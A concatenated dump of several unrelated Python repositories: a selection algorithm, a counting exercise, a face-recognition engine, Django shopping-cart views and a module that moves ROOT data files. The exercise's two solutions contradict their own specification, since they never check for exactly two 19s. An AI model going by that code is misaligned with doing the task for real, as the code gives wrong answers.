range(0,m):\n\t\ttemp = sizes[i]\n\t\tif temp > sizes[longArray]:\n\t\t\tlongArray = i\n\treturn longArray\n\t\n\t\t\t\ndef main():\n\tm = int(get_m())\n\tn = int(get_n())\n\tk = int(get_k())-1\n\t\n\t#create and truncate array to size K\n\tArraySize=[]\n\tSizesofArrays= []\n\t\n\tif k <= n-1:\n\t\tfor i in range(0,m):\t\t\n\t\t\tArraySize.append([0,k])\n\t\t\tSizesofArrays.append(k+1)\n\telse:\n\t\tfor i in range(0,m):\t\t\n\t\t\tArraySize.append([0,n-1])\n\t\t\tSizesofArrays.append(n)\n\n #if all the size of arrays is 1 or 0, x == false. Otherwise keep looping.\n\tx = True\n\twhile (x == True):\n\t\t#find largest size array\n\t\tindexLongArray = LongestArray(SizesofArrays,m)\n\t\t\n\t\t# pick middle element of longest array\n\t\tmiddleIndex = (ArraySize[indexLongArray][0] + ArraySize[indexLongArray][1]) / 2\n\t\tmiddNum = getnum(middleIndex, str(indexLongArray+1)+'.dat')\n\t\t\n\t\tBSearchIndex = []\n\t\tsumIndex = 0\n\t\tfor i in range(0,m):\n\t\t\tif -1 not in ArraySize[i]:\n\t\t\t\ttemp = [ArraySize[i][0], ArraySize[i][1]]\n\t\t\t\tindex = binary_search(ArraySize[i], str(i+1)+'.dat', middNum)\n\t\t\t\tBSearchIndex.append(index)\n\t\t\t\tArraySize[i] = [temp[0], temp[1]]\n\t\t\t\tif index >= ArraySize[i][0]:\n\t\t\t\t\tsumIndex += (index - ArraySize[i][0]) + 1\n\n\t\tif k < sumIndex:\n\t\t\tempty = 0\n\t\t\tfor i in range(0,m):\n\t\t\t\tp = i - empty\n\t\t\t\tif SizesofArrays[i] == 0:\n\t\t\t\t\tempty+=1\n\t\t\t\telse:\n\t\t\t\t\tif BSearchIndex[p] < ArraySize[i][0]:\n\t\t\t\t\t\tArraySize[i][0] = ArraySize[i][1] = -1\n\t\t\t\t\t\tSizesofArrays[i] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tArraySize[i][1] = BSearchIndex[p]\n\t\t\t\t\t\tSizesofArrays[i] = ArraySize[i][1] - ArraySize[i][0] + 1\n\t\telse:\n\t\t\tk = k - sumIndex\n\t\t\tempty = 0\n\t\t\tfor i in range(0,m):\n\t\t\t\tp = i - empty\n\t\t\t\tif SizesofArrays[i] == 0:\n\t\t\t\t\tempty+=1\n\t\t\t\telse:\n\t\t\t\t\tif BSearchIndex[p] != -1:\n\t\t\t\t\t\tif BSearchIndex[p]+1 > ArraySize[i][1]:\n\t\t\t\t\t\t\tArraySize[i][0] = ArraySize[i][1] = -1\n\t\t\t\t\t\t\tSizesofArrays[i] = 0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tArraySize[i][0] = BSearchIndex[p]+1\n\t\t\t\t\t\t\tSizesofArrays[i] = ArraySize[i][1] - ArraySize[i][0]+1\n\t\t\n\t\tx = False\n\t\tfor i in SizesofArrays:\n\t\t\tif i > 1:\n\t\t\t\tx = True\n\n\tfinalArray = []\n\tfor i in range(0,m):\n\t\tif SizesofArrays[i] != 0:\n\t\t\tfinalArray.append(getnum(ArraySize[i][0], str(i+1)+'.dat'))\n\t\n\tfinalArray.sort()\n\twrite_to_output(finalArray[k])\n\t\t\n\t\t\n\t\n\t\t\t\nmain()\n","repo_name":"IamEricYou/CS325","sub_path":"GA1/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37609066246","text":"# 1. Write a Python program find a list of integers with exactly two occurrences of\n# nineteen and at least three occurrences of five. Go to the editor\n# Input:\n# [19, 19, 15, 5, 3, 5, 5, 2]\n# Output:\n# True\n# Input:\n# [19, 15, 15, 5, 3, 3, 5, 2]\n# Output:\n# False\n# Input:\n# [19, 19, 5, 5, 5, 5, 5]\n# Output:\n# True\n\na = [19, 19, 15, 5, 3, 5, 5, 2]\nb = [19, 15, 15, 5, 3, 3, 5, 2]\nc = [19, 19, 5, 5, 5, 5, 5]\n\n# First solution\ndef check_num(int_list):\n counter = 0\n for i in range(len(int_list)):\n if int_list[i] == 5 or int_list[i] == 19:\n counter += 1\n if counter >= 5:\n return True\n\n return False\n\nprint(check_num(a))\nprint(check_num(b))\nprint(check_num(c))\nprint('\\n')\n\n\n# Second solution\ndef check_num_with_method(int_list):\n if (int_list.count(5) + int_list.count(19)) >= 5:\n return True\n return False\n\nprint(check_num_with_method(a))\nprint(check_num_with_method(b))\nprint(check_num_with_method(c))\n\n\n\n\n\n\n\n\n","repo_name":"mirshoddev99/Problems-Patterns","sub_path":"Python-100-Exercise/solutions/1-10/1_prob.py","file_name":"1_prob.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1285291400","text":"\nimport pickle\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import *\nimport sklearn\nimport re\nfrom scipy.spatial import distance\nfrom skimage.transform import resize\nimport subprocess\n\nfrom sklearn.svm import SVC\nfrom scipy import misc\n\nimport cv2\nimport dlib\nimport tensorflow as tf\n\nimport mxnet as mx\nfrom align_dlib import *\n\nnp.random.seed(10)\n\nimport tensorflow as tf\nif tf.__version__ == '2.0.0-alpha0':\n coreModel = tf.keras.models.load_model(\"./models/facenet_512.h5\")\nelse:\n import keras\n coreModel = keras.models.load_model(\"./models/facenet_512_tf1.h5\", custom_objects={'tf': tf})\nDISTANCE_THRESHOLD = 0.4\nfinal_img_size = 160\n\"\"\"\nfrom ArcFace import *\ncoreModel = ArcFace('./models/arcface')\nDISTANCE_THRESHOLD = 0.46\nfinal_img_size = 112\n\"\"\"\n\ndef to_rgb(img):\n if img.ndim == 2:\n w, h = img.shape\n ret = np.empty((w, h, 3), dtype=img.dtype)\n ret[:, :, 0] = ret[:, :, 1] = ret[:, :, 2] = img\n return ret\n elif img.shape[2] == 3:\n return img\n elif img.shape[2] == 4:\n w, h, t = img.shape\n ret = np.empty((w, h, 3), dtype=img.dtype)\n # ret[:, :, 0] = ret[:, :, 1] = ret[:, :, 2] = img\n return img[:, :, :3]\n\nclass AIengine:\n def __init__(self, modelpath='./models', create=False):\n try:\n self.modelpath = modelpath\n classifier = modelpath + \"/model.pkl\"\n meta = modelpath + \"/model.meta\"\n self.clfMap = {'img': self.classifyImg, 'vec': self.classifyVec}\n self.fitMap = {'img': self.fitImg, 'vec': self.fitVec}\n print(classifier)\n if create:\n print(\"Creating new AI Engine\")\n # We Need to create this AI engine and save it on disk\n self.classifier = SVC(kernel='linear', probability=True)\n\n self.labelEncodeMap = dict() # Contains mapping from id string to hash\n # self.metadata['labelDecodeMap'] # Contains mapping from hash to id string\n self.labelDecodeMap = dict()\n\n self.image_size = 160\n self.margin = 1.1\n\n subprocess.getoutput(\"mkdir \" + modelpath)\n self.save(modelpath)\n else:\n if (\"No such file or directory\" in (subprocess.getoutput(\"ls \" + modelpath))):\n return \"AI Engine not created yet!\"\n print(\"Loading AI Engine\")\n try:\n self.classifier = pickle.loads(open(classifier, 'rb').read())\n except Exception as e:\n print(e)\n print(\"Seems like the classifier was not found/is corrupt. Would make a new one for you\")\n self.classifier = SVC(kernel='linear', probability=True)\n self.metadata = pickle.loads(open(meta, 'rb').read())\n\n # Contains mapping from id string to hash\n self.labelEncodeMap = dict(self.metadata['labelEncodeMap'])\n # self.metadata['labelDecodeMap'] # Contains mapping from hash to id string\n self.labelDecodeMap = {value: key for key,\n value in self.labelEncodeMap.items()}\n\n self.image_size = self.metadata['imagesize'] # 160\n self.margin = self.metadata['similarity_margin'] # 1.1\n except Exception as e:\n print(\"Error in AIengine.init\")\n print(e)\n return None\n def embed(self, images, preprocess=False, detections=False):\n try:\n status = True\n if preprocess is True:\n images, status = self.preprocess(images, 10)\n emb = l2_normalize(coreModel.predict(images))\n return emb, status\n except Exception as e:\n print(\"Error in AIengine.embed\")\n print(e)\n return None, False\n\n def fitImg(self, images, labels):\n try:\n embs, status = self.embed(images)\n self.classifier.fit(embs, labels)\n return embs\n except Exception as e:\n print(\"Error in AIengine.fitImg\")\n print(e)\n return False\n\n def fitVec(self, vectors, labels):\n try:\n embs, status = vectors # self.embed(images)\n self.classifier.fit(embs, labels)\n return embs\n except Exception as e:\n print(\"Error in AIengine.fitVec\")\n print(e)\n return False\n\n def fit(self, data, labels, fitType='img'):\n try:\n lbls = list()\n for i in labels:\n if i not in self.labelEncodeMap:\n self.labelEncodeMap[i] = hash(i)\n self.labelDecodeMap[hash(i)] = i\n lbls.append(self.labelEncodeMap[i])\n print(self.labelEncodeMap)\n return self.fitMap[fitType](data, lbls).tolist()\n except Exception as e:\n print(\"Error in AIengine.fit\")\n print(e)\n return False\n\n def classifyImg(self, images, preprocess=True):\n vectors, status = self.embed(images, preprocess)\n val = [self.labelDecodeMap[i] for i in self.classifier.predict(vectors) if i in self.labelDecodeMap]\n if len(val) == 0:\n return None, False \n return val, status\n\n def classifyVec(self, vectors, preprocess):\n if vectors is None:\n return None, False\n hashs = self.classifier.predict(vectors)\n val = [self.labelDecodeMap[i] for i in hashs if i in self.labelDecodeMap]\n for i in hashs:\n if i not in self.labelDecodeMap:\n print(\"hash \" + str(i) + \" Not in map\")\n if val is None or len(val) == 0:\n print(\"no class predicted\")\n return None, False \n return val, True\n\n def classify(self, data, clfType='img', preprocess=True):\n try:\n return self.clfMap[clfType](data, preprocess)\n except Exception as e:\n print(clfType)\n print(\"Error in AIengine.classify\")\n print(e)\n return None, False\n\n def isSimilarII(self, img1, img2, margin=1.1):\n try:\n v1 = self.embed([img1])\n v2 = self.embed([img2])\n dis = distance.cosine(v1, v2)\n if dis > margin:\n return False\n else:\n return True\n except Exception as e:\n print(\"Error in AIengine.isSimilarII\")\n print(e)\n return None\n\n def isSimilarIV(self, img, vec, margin=1.1):\n try:\n v1 = self.embed([img])\n v2 = vec\n dis = distance.cosine(v1, v2)\n if dis > margin:\n return False\n else:\n return True\n except Exception as e:\n print(\"Error in AIengine.isSimilarIV\")\n print(e)\n return None\n\n def isSimilarVV(self, vec1, vec2, margin=1.0):\n try:\n v1 = vec1\n v2 = vec2\n dis = distance.cosine(v1, v2)\n print(dis)\n if dis > margin:\n return False\n else:\n return True\n except Exception as e:\n print(\"Error in AIengine.isSimilarVV\")\n print(e)\n return None\n\n @staticmethod\n def prewhiten(x):\n if x.ndim == 4:\n axis = (1, 2, 3)\n size = x[0].size\n elif x.ndim == 3:\n axis = (0, 1, 2)\n size = x.size\n else:\n raise ValueError('Dimension should be 3 or 4')\n\n mean = np.mean(x, axis=axis, keepdims=True)\n std = np.std(x, axis=axis, keepdims=True)\n std_adj = np.maximum(std, 1.0/np.sqrt(size))\n y = (x - mean) / std_adj\n return y\n\n @staticmethod\n def preprocess(images, margin=10, image_size=160, face_extract_algo=face_extract_dnn):\n try:\n faceDetected = True\n aligned_images = []\n detections = []\n for img in images:\n if type(img) is list:\n img = np.array(img)\n img = to_rgb(img)\n bb = dlib_model.getLargestFaceBoundingBox(img)\n if bb is None:\n print(\"dlib couldn't find any face, using dnn...\")\n aligned = img\n _img, faceDetected = face_extract_dnn(aligned, margin, image_size = image_size)\n # Comment above lines an uncomment below lines to ignore bad quality face images\n #continue\n else:\n aligned = dlib_model.align(img, bb=bb)\n if aligned is None:\n print(\"Error! No aligned photo\")\n aligned = img\n _img, ss = face_extract_dnn(aligned, margin, image_size = image_size)\n x, y, w, h = face_utils.rect_to_bb(bb)\n faceDetected = (x, y, x + w, y + h)\n if faceDetected is False:\n print(\"No face detected\")\n print(type(aligned))\n continue\n detections.append(faceDetected)\n aligned_images.append(_img)\n if len(aligned_images) == 0:\n return images, False\n return np.array(aligned_images), detections\n except Exception as e:\n print(\"Error in Preprocess \")\n print(e)\n return images, False\n\n def save(self, modelpath):\n self.modelpath = modelpath\n self.metadata = {'labelEncodeMap': self.labelEncodeMap, 'labelDecodeMap': self.labelDecodeMap,\n 'imagesize': self.image_size, 'similarity_margin': self.margin}\n f = open(modelpath+'/model.meta', 'wb')\n f.write(pickle.dumps(self.metadata))\n f.close()\n\n f = open(modelpath+'/model.pkl', 'wb')\n f.write(pickle.dumps(self.classifier))\n f.close()\n return True\n","repo_name":"AshishKumar4/Sketchula","sub_path":"InferenceRESTful/AIengine.py","file_name":"AIengine.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70292699043","text":"# from asyncio.windows_events import NULL\nfrom django.shortcuts import render,get_object_or_404\nfrom django.http import JsonResponse\nfrom .cart import Cart\nfrom store.models import *\nfrom django.core.exceptions import ValidationError\nfrom django.views import View\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_control\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib import messages\nfrom django.template.loader import render_to_string\nfrom django.db import transaction\n\n@method_decorator(cache_control(no_cache=True, must_revalidate=True, no_store=True), name='get')\nclass cart_summaryView(LoginRequiredMixin,View):\n \n def get(self, request):\n\n if request.session.get('continue') == None:\n request.session['continue'] = True\n cart=Cart(request)\n cartItems=cart.cart_items_quantity()\n\n context={'cart':cart,'cartItems':cartItems}\n return render(request,'store/cart.html',context)\n\n\n\nclass cart_addView(LoginRequiredMixin,View):\n \n def post(self, request):\n \n cart=Cart(request)\n data = {\n 'msg': render_to_string('messages.html', {}),\n }\n\n productId=int(request.POST.get('productId'))\n\n try:\n product_qty=int(request.POST.get('productQty'))\n except ValueError:\n msg='Please specify correct ammount'\n messages.add_message(request, messages.ERROR, msg)\n return JsonResponse({'data':data})\n \n with transaction.atomic():\n product = Product.objects.select_for_update(nowait=True).get(id=productId)\n \n cartProductQuantity=cart.get_product_quantity(product.id)\n\n if cartProductQuantity + product.availableQuantity > 10:\n maxQuantity=10\n else:\n maxQuantity=cartProductQuantity + product.availableQuantity\n \n\n try:\n if product_qty <= 10 and product_qty <= maxQuantity and product_qty > 0:\n cart.reserveProductQuantity(product=product,qty=product_qty)\n cart.add(product=product,qty=product_qty)\n messages.add_message(request, messages.SUCCESS, \"Item added to cart\")\n else:\n raise ValueError('Ordered amount is not available')\n except ValueError as ve:\n msg=str(ve)\n messages.add_message(request, messages.WARNING, msg)\n \n return JsonResponse({'data':data})\n\n\n cart_qty=cart.__len__()\n \n \n \n user=request.user\n customer,created=Customer.objects.get_or_create(\n user=user,\n )\n \n order,created=Order.objects.get_or_create(customer=customer,complete=False)\n orderItem,created=OrderItem.objects.get_or_create(order=order,product=product)\n \n orderItem.quantity=product_qty\n orderItem.save(update_fields=['quantity'])\n\n response = JsonResponse({'qty':cart_qty})\n\n return response\n\n\n\n\n \nclass cart_deleteView(LoginRequiredMixin,View):\n def post(self,request):\n cart=Cart(request)\n product_id=int(request.POST.get('productId'))\n \n \n if request.POST.get('action') == 'post':\n action2=request.POST.get('action2')\n \n cartItemQuantity=cart.get_product_quantity(product_id) \n cart.delete(productId=product_id)\n if cart.__len__():\n cart_qty=cart.__len__()\n else:\n cart_qty=\"0\"\n cart_total_price=cart.get_total_price()\n\n\n user=request.user\n customer,created=Customer.objects.get_or_create(\n user=user,\n )\n \n order,created=Order.objects.get_or_create(customer=customer,complete=False)\n \n with transaction.atomic():\n product = Product.objects.select_for_update(nowait=True).get(id=product_id)\n \n orderItem,created=OrderItem.objects.get_or_create(order=order,product=product)\n \n if action2 == \"remove\":\n product.reservedQuantity-=cartItemQuantity\n product.save(update_fields=['reservedQuantity'])\n orderItem.quantity=0\n orderItem.save(update_fields=['quantity'])\n orderItem.delete()\n\n\n response =JsonResponse({'cart_qty':cart_qty,'cart_total_price':cart_total_price})\n return response\n\n\n\n\nclass cart_updateView(LoginRequiredMixin,View):\n def post(self,request):\n cart=Cart(request)\n data = {\n 'msg': render_to_string('messages.html', {}),\n }\n\n if request.POST.get('action') == 'post':\n \n product_id=int(request.POST.get('productId'))\n \n try:\n product_qty=int(request.POST.get('productQty'))\n except ValueError:\n msg='Please specify correct ammount'\n messages.add_message(request, messages.ERROR, msg)\n return JsonResponse({'data':data})\n\n product_qty_max=int(request.POST.get('productQty'))\n product=get_object_or_404(Product, id=product_id)\n \n try:\n cartProductQty=cart.get_product_quantity(product.id)\n\n if product_qty <= 10 and product_qty > 0 and product_qty <= product.availableQuantity + cartProductQty: \n cart.reserveUpdatedProductQuantity(product=product,qty=product_qty)\n cart.update(productId=product_id,qty=product_qty)\n else:\n request.session['continue']=False\n raise ValueError('Ordered quantity for ' + product.name + ' can not be higher than 10, higher than the remaining available quantity or lower than 1, please correct your order quantity if you want to proceed')\n \n except ValueError as ve:\n msg=str(ve)\n messages.add_message(request, messages.ERROR, msg)\n \n return JsonResponse({'data':data})\n \n\n if request.user.is_authenticated:\n \n user=request.user\n customer,created=Customer.objects.get_or_create(\n user=user, \n )\n \n order,created=Order.objects.get_or_create(customer=customer,complete=False)\n orderItem,created=OrderItem.objects.get_or_create(order=order,product=product)\n \n orderItem.quantity=product_qty\n orderItem.save(update_fields=['quantity'])\n\n\n product_price=cart.get_product_price(productId=product_id)\n\n product_total_price=product_qty * product_price\n \n cart_qty=cart.__len__()\n cart_total_price=cart.get_total_price()\n\n\n response=JsonResponse({'cart_qty':cart_qty,'cart_total_price':cart_total_price,'product_total_price':round(product_total_price,2)})\n return response\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"interlooop/Psearch-1","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"338922562","text":"#!/usr/bin/env python\n\n\"\"\" Handle and move files from the receiver(s) to Overwatch sites and EOS.\n\nThis simple module is responsible for moving data which is provided by the receiver to other\nsites. It will retry a few times if sites are unavailable.\n\nWe take a simple approach of determine which files to transfer, and then moving them to the\nappropriate locations. We could try to use something like ``watchdog`` to do something more\nclever when a file changes. However, we want to batch transfer files to take advantage of\n``rsync``, so such an approach would require much more complicated bookkeeping (for example,\nwhat happens if a file shows up when transferring data, etc). The much simpler approach that\nwe use solves our problem just as well, but is also much easier to write and maintain.\n\n.. codeauthor:: Raymond Ehlers , Yale University\n\"\"\"\n\n# Python 2/3 support\nfrom __future__ import print_function\nfrom future.utils import iteritems\nfrom future.utils import itervalues\n\n# General\nimport os\nimport math\nimport time\nimport shutil\nimport subprocess\nimport tempfile\nimport functools\n\nimport ROOT\n\n# Logging\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Config\nfrom . import config\n(parameters, filesRead) = config.readConfig(config.configurationType.processing)\n\ndef retry(tries, delay = 3, backoff = 2):\n \"\"\" Retries a function or method until it returns ``True`` or runs out of retries.\n\n Retries are performed at a specific delay with an additional back off term. The retries go\n as\n\n .. math::\n\n t = delay * backoff^(nTry)\n\n where :math:`nTry` is the trial that we are on. Note that 2 retries corresponds to three function\n calls - the original call, and then up to two retries if the calls fail.\n\n Original decorator from the `Python wiki `__,\n and using some additional improvements `here `__,\n and some ideas `here `__.\n\n Args:\n tries (int): Number of times to retry.\n delay (float): Delay in seconds for the initial retry. Default: 3.\n backoff (float): Amount to multiply the delay by between each retry. See the formula above.\n Returns:\n bool: True if the function succeeded.\n \"\"\"\n # Argument validation\n if backoff <= 1:\n raise ValueError(\"Backoff must be greater than 1.\")\n tries = math.floor(tries)\n if tries < 0:\n raise ValueError(\"Tries must be 0 or greater.\")\n if delay <= 0:\n raise ValueError(\"Delay must be greater than 0.\")\n\n def deco_retry(f):\n @functools.wraps(f)\n def f_retry(*args, **kwargs):\n # Make mutable\n mtries, mdelay = tries, delay\n\n # First attempt at calling the function\n rv = f(*args, **kwargs)\n while mtries > 0:\n # If we ever get a return value of `True`, we are done.\n if rv is True:\n return True\n\n # Setup for the next attempt and wait before the next attempt\n mtries -= 1\n time.sleep(mdelay)\n mdelay *= backoff\n\n # Try again\n rv = f(*args, **kwargs)\n\n # Ran out of tries. Return failure.\n return False\n\n # true decorator -> decorated function\n return f_retry\n # @retry(arg[, ...]) -> true decorator\n return deco_retry\n\ndef determineFilesToMove(directory):\n \"\"\" Determine the files which are available to be moved or otherwise transferred.\n\n Since there could be additional directories which we want to ignore, we want to use avoid\n using ``os.walk()``, which will include subdirectories. Instead, we use a simpler solution\n with ``os.listdir()`` and verify that we include only files.\n\n Note:\n These files are required to be ROOT files by requring that they end with the ``.root`` extension.\n\n Note:\n We explicitly have to select the filenames on ``endswith(\".root\")`` rather than just ``\"root\" in f``\n because ROOT creates temporary files of the form ``.desiredFilename.root.randomString`` where\n ``randomString`` is usually 6 characters long. The files disappear almost immediately (and the\n desired filename shows up). This is presumably to ensure that writes are atomic when writing new\n objects. Thus, we want to avoid these temporary files. And we can do that be selecting that it ends\n with \".root\".\n\n The temporary ROOT files (detailed in the comments) failed with the following error:\n\n .. code-block:: none\n\n rsync: stat \"data/.EMChistos_294832_C_2018_10_22_9_53_55.root.izUVHA\" failed: No such file or directory (2)\n rsync: rename \"data/.EMChistos_294832_C_2018_10_22_9_53_55.root.izUVHA\" -> \"EMChistos_294832_C_2018_10_22_9_53_55.root\": No such file or directory (2)\n rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1196) [sender=3.1.2]\n\n Thanks to the retry capabilities, it will immediately retry, so this shouldn't cause a major problem\n on the transfer side. However, it will cause problems on the receiver side because the malformed\n filenames won't be handled properly by Overwatch.\n\n Args:\n directory (str): Path to the directory where the files are stored.\n Returns:\n list: List of the files available to be moved. Note that just the filenames are stored,\n so it's the callers responsibility to include the directory when using the filename.\n \"\"\"\n # NOTE: See the information above about why we explicitly select on ``endswith(\"root\")``.\n return [f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f)) and f.endswith(\".root\")]\n\n@retry(tries = parameters[\"dataTransferRetries\"])\ndef rsyncFilesFromFilelist(directory, destination, filelistFilename, transferredFilenames):\n \"\"\" Transfer files via rsync based on a list of filenames in a given file.\n\n Note:\n This must be a separate function which returns a bool to work properly with the retry wrapper.\n Consequently, we return any transferred filenames by reference via ``transferredFilenames``.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Path to the remote directory where the files are stored. Since the\n files are being transferred with rsync via ssh, this path should be of the form\n ``user@host:/dir/path``.\n filelistFilename (str): Filename of the file which contains the list of files to transfer.\n transferredFilenames (list): List of filenames which were transfer. Used to return this information\n because we have to return ``True`` or ``False`` with the retry wrapper.\n Returns:\n bool: True if the files were transferred successfully.\n \"\"\"\n # Check destination value. If we are testing, it doesn't need to have the \":\", but for normal operation,\n # it usually will.\n if \":\" not in destination:\n logger.warning(\"Expected, but did not find, \\\":\\\" in the destination path \\\"{destination}\\\".\".format(destination = destination))\n\n # Needed so that rsync will transfer to that directory!\n if not destination.endswith(\"/\"):\n destination = destination + \"/\"\n\n # Define the rsync command itself.\n rsync = [\n \"rsync\",\n # -l preserves symlinks.\n # -t preserves timestamps.\n # -h presents human readable information.\n # -v is verbose. (Not currently included).\n \"-lth\",\n # This outputs just the name of the file that is transferred.\n r\"--out-format=%n\",\n # Files from is relative to the remote path.\n \"--files-from={name}\".format(name = filelistFilename),\n # Source\n directory,\n # Destination\n destination,\n ]\n\n logger.debug(\"Args: {rsync}\".format(rsync = rsync))\n try:\n result = subprocess.check_output(args = rsync, universal_newlines = True)\n except subprocess.CalledProcessError:\n # The call failed for some reason. We want to handle it.\n logger.debug(\"rsync call failed!\")\n return False\n\n # NOTE: Getting to this point is equivalent to having a return code of 0.\n # Change: \"hello\\nworld\\n\" -> [\"hello\", \"world\"]\n parsedResult = result.strip(\"\\n\").split(\"\\n\")\n # Extend so we don't entirely reassign the reference.\n transferredFilenames.extend(parsedResult)\n\n logger.debug(\"Result: {}\".format(result))\n logger.debug(\"Result parsed: {}\".format(parsedResult))\n\n return True\n\ndef copyFilesToOverwatchSites(directory, destination, filenames):\n \"\"\" Copy the given files to the Overwatch deployment sites.\n\n The Overwatch sites and where the files should be stored at those sites is determined\n in the configuration. Retries should usually not be necessary here, but are included\n as an additional assurance.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Path to the remote directory where the files are stored. Since the\n files are being transferred with rsync via ssh, this path should be of the form\n ``user@host:/dir/path``.\n filenames (list): Paths to files to copy to each Overwatch site.\n Returns:\n list: Filenames for all of the files which **failed**.\n \"\"\"\n # First write the filenames out to a temp file so we can pass them to rsync.\n with tempfile.NamedTemporaryFile() as f:\n # Need encode because the file is written as bytes.\n f.write(\"\\n\".join(filenames).encode())\n # Move back to the front so it can be read.\n f.seek(0)\n\n # Perform the actual files transfer.\n transferredFilenames = []\n success = rsyncFilesFromFilelist(directory = directory,\n destination = destination,\n filelistFilename = f.name,\n transferredFilenames = transferredFilenames)\n\n logger.debug(\"transferredFilenames: {}\".format(transferredFilenames))\n\n # We want to return the files that _failed_, so if the files were transferred,\n # we return an empty list. Otherwise, we return the files that were not transferred.\n failedFilenames = list(set(filenames) - set(transferredFilenames))\n return [] if success else failedFilenames\n\n@retry(tries = parameters[\"dataTransferRetries\"])\ndef copyFileToEOSWithRoot(directory, destination, filename):\n \"\"\" Copy a given file to EOS using ROOT capabilities.\n\n We include the possibility to show the ROOT ``cp`` progress bar if we are in debug mode.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Directory on EOS to which the file should be copied.\n filename (str): Local filename of the string to be copied. This will be used for setting\n the path where it will be copied.\n Returns:\n bool: True if the file was copied successfully\n \"\"\"\n source = os.path.join(directory, filename)\n destination = os.path.join(destination, filename)\n # We only want to see such information if we are debugging. Otherwise, it will just clog up the logs.\n showProgressBar = parameters[\"debug\"]\n logger.debug(\"Copying file from {source} to {destination}\".format(source = source, destination = destination))\n return ROOT.TFile.Cp(source, destination, showProgressBar)\n\ndef copyFilesToEOS(directory, destination, filenames):\n \"\"\" Copy the given filenames to EOS.\n\n Files which failed are returned so that these files can be saved and the admin can be alerted to take\n additional actions.\n\n Args:\n directory (str): Path to the directory where the files are stored locally.\n destination (str): Directory on EOS to which the file should be copied.\n filenames (list): Files to copy to EOS.\n Returns:\n list: Filenames for all of the files which **failed**.\n \"\"\"\n failedFilenames = []\n for f in filenames:\n # This function will automatically retry.\n res = copyFileToEOSWithRoot(directory = directory, destination = destination, filename = f)\n # Store the failed files so we can notify the admin that something went wrong.\n if res is False:\n failedFilenames.append(f)\n\n return failedFilenames\n\ndef storeFailedFiles(siteName, filenames):\n \"\"\" Store failed files in a safe place for later transfer.\n\n This function should be called for each site. Each site maintains a different directory as different\n files could fail for different sites.\n\n Args:\n siteName (str): Name of the site for which the files failed to transfer.\n filenames (list): Filenames which failed to transfer.\n Returns:\n None.\n \"\"\"\n # Create the storage location if necessary and copy the files to it.\n storagePath = os.path.join(parameters[\"receiverDataTempStorage\"], siteName)\n if not os.path.exists(storagePath):\n os.makedirs(storagePath)\n\n for f in filenames:\n try:\n shutil.copy2(os.path.join(parameters[\"receiverData\"], f), os.path.join(storagePath, f))\n except shutil.Error as e:\n # Log the exception (so it will get logged and sent via mail when appropriate), and then\n # re-raise it so it doesn't get lost.\n logger.critical(\"Error in copying the failed transfer files. Error: {e}\".format(e = e))\n # raise with no arguments re-raises the last exception.\n raise\n\n # Sanity check that the files were successfully copied.\n # There can be other files in the directory, so we just need to be certain that the filenames\n # that we are handling here are actually copied.\n assert set(filenames).issubset(os.listdir(storagePath))\n\n # By logging, it will be sent to the admins when appropriate.\n # To ensure that we don't get overwhelmed by messages which only vary by the filename used, we\n # only include the sitename in the error. However, by printing the information at the info level,\n # it will be included via sentry, so we'll still have information the filenames which failed.\n logger.info(\"Files failed to copy for site {siteName}. Filenames: {filenames}\".format(siteName = siteName, filenames = filenames))\n logger.error(\"Files failed to copy for site {siteName}\".format(siteName = siteName))\n\ndef processReceivedFiles():\n \"\"\" Main driver function for receiver file processing and moving.\n\n This function relies on the values of \"receiverData\", \"receiverDataTempStorage\", \"dataTransferLocations\".\n\n Note:\n Configuration is controlled via the Overwatch YAML configuration system. In particular,\n the options relevant here are defined in the base module.\n\n Args:\n None.\n Returns:\n tuple: (successfullyTransferred, failedFilenames) where successfullyTransferred (list) is the\n filenames of the files which were successfully transferred, and failedFilenames (dict) is the\n filenames which failed to be transferred, with the keys as the site names and the values as the\n filenames.\n \"\"\"\n # These are just raw filenames.\n filenamesToTransfer = determineFilesToMove(directory = parameters[\"receiverData\"])\n\n if not filenamesToTransfer:\n logger.info(\"No new files found. Returning.\")\n return None, None\n\n logger.info(\"Transfering data to sites: {sites}\".format(sites = \", \".join(parameters[\"dataTransferLocations\"])))\n\n failedFilenames = {}\n for siteName, destination in iteritems(parameters[\"dataTransferLocations\"]):\n transferFunc = copyFilesToOverwatchSites\n if \"EOS\" in siteName.upper():\n transferFunc = copyFilesToEOS\n # Perform the actual transfer for each configured location.\n # We need to keep track of which files failed to transfer to which sites.\n failedFilenames[siteName] = transferFunc(directory = parameters[\"receiverData\"],\n destination = destination,\n filenames = filenamesToTransfer)\n\n # Handle filenames which haven't been deleted.\n # We only need to do this if there are some which failed.\n # We also keep track of which failed for logging.\n totalFailedFilenames = set()\n if any(itervalues(failedFilenames)):\n # Copy to a safe temporary location for storage until they can be dealt with.\n # We make a copy and store them separately because the same file could have failed for multiple\n # transfers. However, we shouldn't lose much in storage because these aren't intended to stay a\n # long time.\n for siteName, filenames in iteritems(failedFilenames):\n totalFailedFilenames.update(filenames)\n # Only attempt to store the failed files if some files actually failed.\n if filenames:\n storeFailedFiles(siteName = siteName, filenames = filenames)\n\n # Log which filenames were transferred successfully.\n # We will eventually want to return a list instead of a set, so we just convert it here.\n 